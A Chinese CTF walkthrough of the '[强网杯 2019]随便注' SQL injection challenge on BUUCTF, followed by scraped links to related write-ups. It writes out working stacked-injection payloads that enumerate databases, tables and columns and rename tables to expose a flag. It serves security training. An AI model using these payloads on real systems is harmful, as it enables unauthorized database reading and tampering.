BUUCTF [强网杯 2019]随便注
题目
打开环境发现是经典的提交界面
老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了,那没办法了,只好去查查大佬的文章,发现需要使用堆叠查询
那就搞起,查数据库
0'; show databases; #
爆表,发现俩表
0'; show tables; #
爆表中的数据
0';show columns from words;#
0';show columns from `1919810931114514`;#
看见数字那个表里面有明显的flag,这里怎么也爆不出数据了只能看看大佬写的wp了,大佬是这么说的
那么查询语句很有可能是 : selsect id,data from words where id =
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦
0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
我裂开了这谁能想到,这里谢谢大佬[强网杯 2019]随便注 1 - ZM思 - 博客园
BUUCTF [强网杯 2019]随便注相关推荐
- buuctf [强网杯 2019]随便注 1
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...
- BMZCTF 强网杯 2019 随便注 原理+题解
目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...
- BUUCTF Web [强网杯 2019]随便注
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- 强网杯 2019]随便注 【SQL注入】四种解法
题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...
- [强网杯 2019]随便注 —— 堆叠注入
[强网杯 2019]随便注 前言 个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...
- [强网杯 2019]随便注 1
题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...
- 【BUUCTF】强网杯 2019随便注1 write up
输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...
- 【BUUCTF】[强网杯 2019]随便注 1
这是一个典型的sql注入题目 知识点: 1.注入点检测 2.万能匹配 3.暴力获得数据表和其属性 4.sql语句的掌握(order by; union select; rename table; al ...
- (二)强网杯2019[随便注]
堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...
最新文章
- 一套使用注入和Hook技术托管入口函数的方案
- 数据结构 算法与应用C 语言描述第六章,数据结构算法与应用-C语言描述002.pdf
- 程序员的幸福:上个月被裁拿赔偿,这个月找到涨薪50%的工作
- 编写python程序输出图形_python 图形化编程---文本输入框
- 社区奖品之DOULEX按键灯
- 如何让某些用户对Marketing Cloud的contact数据只能实施只读操作
- python字典和集合对象可以进行索引操作_Python中的字典跟集合整理笔记
- 一个jeecg整合activiti的学习例子,源码下载
- C# WinForm窗口最小化到系统托盘
- C#编写的一个SFTP工具类
- 线性共轭梯度法python_python实现共轭梯度法
- 一分钟教会你烫了头发该怎么打理
- 进阶级 - Git Hub 常用指南
- mediawiki内嵌php,Mediawiki的模板
- html5 tbody,tbody
- 关于微信群、QQ群和其他发布平台
- Axure RP Extension for Chrome的安装
- 前端基础 HTML 第九章 使用框架结构 ----暑假学习第五天
- 与思科交换机三层链路聚合连接 ❀ 飞塔 (Fortinet) 防火墙
- C语言实现,输入某年某月某日,判断这一天是这一年的第几天?